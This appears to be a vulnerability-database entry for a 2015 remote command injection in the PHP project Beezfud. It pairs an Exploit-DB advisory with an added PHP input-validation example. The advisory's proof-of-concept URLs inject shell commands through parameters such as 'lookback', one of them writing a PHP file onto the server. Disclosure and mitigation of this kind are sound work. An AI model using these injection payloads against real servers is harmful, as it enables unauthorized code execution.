Vendor: Beezfud
By: Ashiyane Digital Security Team
CVSS: 9,8 (HIGH)
Remote Code Execution
CWE: 78
Product Name: Beezfud
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Beezfud Remote Code Execution

A remote code execution vulnerability exists in Beezfud due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Input validation should be used to prevent the execution of malicious code.
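One way to apply that validation to the five parameters named in the advisory, shown as an added example that is not Beezfud's code. It assumes each parameter is meant to carry a small non-negative integer and that the values end up in a shell command line; the program path `/usr/local/bin/report-tool` and the function names are hypothetical.

```php
<?php
// Added example, not code from the Beezfud project.
// Assumption: every parameter below is expected to be a small integer.
const SHELL_BOUND_PARAMS = ['lookback', 'max', 'range', 'latest', 'earliest'];

/** Return only the known parameters, each checked against a strict allowlist. */
function validated_params(array $query): array
{
    $clean = [];
    foreach (SHELL_BOUND_PARAMS as $name) {
        if (!array_key_exists($name, $query)) {
            continue;
        }
        $value = $query[$name];
        // Reject arrays (?lookback[]=x) and anything that is not 1-6 ASCII digits.
        // \A and \z anchor the whole string, so a trailing newline fails too.
        if (!is_string($value) || preg_match('/\A[0-9]{1,6}\z/', $value) !== 1) {
            throw new InvalidArgumentException("invalid value for '$name'");
        }
        $clean[$name] = (int) $value;
    }
    return $clean;
}

/** Build the command line; every argument is quoted even after validation. */
function build_command(string $program, array $params): string
{
    $parts = [escapeshellarg($program)];
    foreach ($params as $name => $value) {
        $parts[] = escapeshellarg("--$name=$value");
    }
    return implode(' ', $parts);
}

// Constructed sample queries: one well-formed, one in the shape of the PoC.
$samples = [
    ['lookback' => '30', 'max' => '10'],
    ['lookback' => ';Command;'],
];
foreach ($samples as $query) {
    try {
        $params = validated_params($query);
        echo build_command('/usr/local/bin/report-tool', $params), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Validation and quoting are layered on purpose: the allowlist rejects shell metacharacters outright, and `escapeshellarg()` keeps the command line safe if a parameter's accepted format is later widened.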
Source

Exploit-DB raw data:

================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php

# PoC :

http://localhost/beezfud/index.php?parameter=;Command;

Vulnerable Parameters : lookback , max , range , latest , earliest


Example :

http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
?>' >info.php;

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================